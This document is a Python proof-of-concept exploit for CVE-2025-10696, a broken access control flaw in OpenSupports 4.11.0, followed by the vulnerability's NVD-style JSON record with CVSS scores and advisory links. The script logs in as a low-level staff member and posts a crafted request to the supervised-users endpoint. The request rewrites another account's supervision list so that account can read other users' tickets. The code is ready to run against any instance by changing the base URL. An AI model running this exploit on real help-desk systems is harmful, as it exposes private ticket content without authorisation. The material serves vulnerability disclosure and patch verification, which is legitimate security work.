CVE-2025-10696

# CVE-2025-10696 - OpenSupports Supervised Users Authorization Bypass PoC # Vulnerability: IDOR / Broken Access Control in supervised users list editing endpoint # Affected: OpenSupports 4.11.0 # Attacker requirement: Level 1 staff account import requests BASE_URL = "http://target-opensupports-instance.com" SESSION = requests.Session() # Step 1: Authenticate as a Level 1 staff member login_payload = { "email": "[email protected]", "password": "attacker_password" } SESSION.post(f"{BASE_URL}/api/login", json=login_payload) # Step 2: Exploit the IDOR vulnerability # Modify the supervised users list of a TARGET user (not the attacker's own account) # The endpoint does not verify that the actor owns the supervised-users list being modified target_user_id = 2 # ID of the victim user whose supervised list will be modified supervised_user_id = 5 # ID of the user whose tickets the victim should now see poc_payload = { "userId": target_user_id, # Victim's user ID (no ownership check performed) "supervisedUsers": [supervised_user_id] # User to add as supervised } # The vulnerable endpoint accepts this request without verifying ownership response = SESSION.post( f"{BASE_URL}/api/edit-supervised-users", json=poc_payload ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Step 3: After successful modification, the victim (target_user_id) will be able # to view tickets belonging to supervised_user_id, breaking the authorization model # and exposing other users' ticket content.

{"cve": {"id": "CVE-2025-10696", "sourceIdentifier": "[email protected]", "published": "2025-10-03T21:15:33.503", "lastModified": "2025-12-22T13:19:27.750", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSupports exposes an endpoint that allows the list of 'supervised users' for any account to be edited, but it does not validate whether the actor is the owner of that list. A Level 1 staff member can modify the supervision relationship of a third party (the target user), who can then view the tickets of the added 'supervised' users. This breaks the authorization model and filters the content of other users' tickets.This issue affects OpenSupports: 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensupports:opensupports:4.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "79B3C4CE-1AEE-44B6-BDEC-726B28A99A89"}]}]}], "references": [{"url": "https://fluidattacks.com/advisories/stratovarius", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/opensupports/opensupports", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://fluidattacks.com/advisories/stratovarius", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}